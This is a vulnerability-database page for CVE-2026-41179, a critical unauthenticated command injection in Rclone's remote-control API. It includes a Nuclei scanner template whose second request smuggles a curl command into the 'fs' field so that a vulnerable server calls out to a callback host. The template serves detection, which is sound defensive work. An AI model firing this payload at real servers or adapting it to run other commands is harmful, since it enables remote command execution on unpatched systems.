| Reporter | Title | Published | Views | Family All 53 |
|---|---|---|---|---|
| Exploit for Missing Authentication for Critical Function in Rclone | 28 Jun 202611:58 | – | githubexploit | |
| CVE-2026-41179 | 23 Apr 202600:03 | – | attackerkb | |
| Amazon Linux 2023 : rclone (ALAS2023-2026-1658) | 20 May 202600:00 | – | nessus | |
| Amazon Linux 2 : rclone, --advisory ALAS2-2026-3285 (ALAS-2026-3285) | 14 May 202600:00 | – | nessus | |
| Fedora 44 : restic (2026-2290b9a9ad) | 20 Jun 202600:00 | – | nessus | |
| Fedora 43 : rclone (2026-2bb2aee489) | 10 May 202600:00 | – | nessus | |
| Fedora 44 : rclone (2026-63341da831) | 10 May 202600:00 | – | nessus | |
| Fedora 43 : restic (2026-e6094447f0) | 20 Jun 202600:00 | – | nessus | |
| openSUSE 16 Security Update : rclone (openSUSE-SU-2026:20620-1) | 25 Apr 202600:00 | – | nessus | |
| Rclone 1.48.x < 1.73.5 Command Injection (CVE-2026-41179) | 24 Apr 202600:00 | – | nessus |
id: CVE-2026-41179
info:
name: RClone RC - Command Injection
author: theamanrawat
severity: critical
description: |
Rclone >= 1.48.0 and < 1.73.5 contains an unauthenticated local command execution caused by unauthenticated access to the RC endpoint operations/fsinfo with attacker-controlled fs input, letting unauthenticated attackers execute local commands, exploit requires reachable RC deployment without global HTTP authentication.
impact: |
Unauthenticated attackers can execute local commands remotely, potentially leading to full system compromise.
remediation: |
Update to version 1.73.5 or later.
reference:
- https://github.com/rclone/rclone/security/advisories/GHSA-jfwf-28xr-xw6q
- https://nvd.nist.gov/vuln/detail/CVE-2026-41179
classification:
cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
cvss-score: 9.2
cve-id: CVE-2026-41179
epss-score: 0.09199
epss-percentile: 0.94715
cwe-id: CWE-78
metadata:
verified: true
max-request: 2
vendor: rclone
product: rclone
tags: cve,cve2026,rce,rclone,webdav,oast,unauth
flow: http(1) && http(2)
http:
- raw:
- |
POST /rc/noop HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{}
matchers:
- type: dsl
dsl:
- 'contains(body, "{}")'
- 'contains(content_type, "application/json")'
- 'status_code == 200'
condition: and
internal: true
- raw:
- |
POST /operations/fsinfo HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"fs":":webdav,url='http://{{interactsh-url}}/',vendor=other,bearer_token_command='curl http://{{interactsh-url}}/{{randstr}}':"}
matchers:
- type: dsl
dsl:
- 'contains(body, "Features")'
- 'contains(interactsh_protocol, "http")'
- 'status_code == 200'
condition: and
# digest: 4a0a00473045022032a2d307aac459712461cc53dfb3db583b814bccf237364f963da955535f8d3f022100c94166ec3838155bccb5961a115754e77aef7b61cea917399f8215e5a92ef988:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation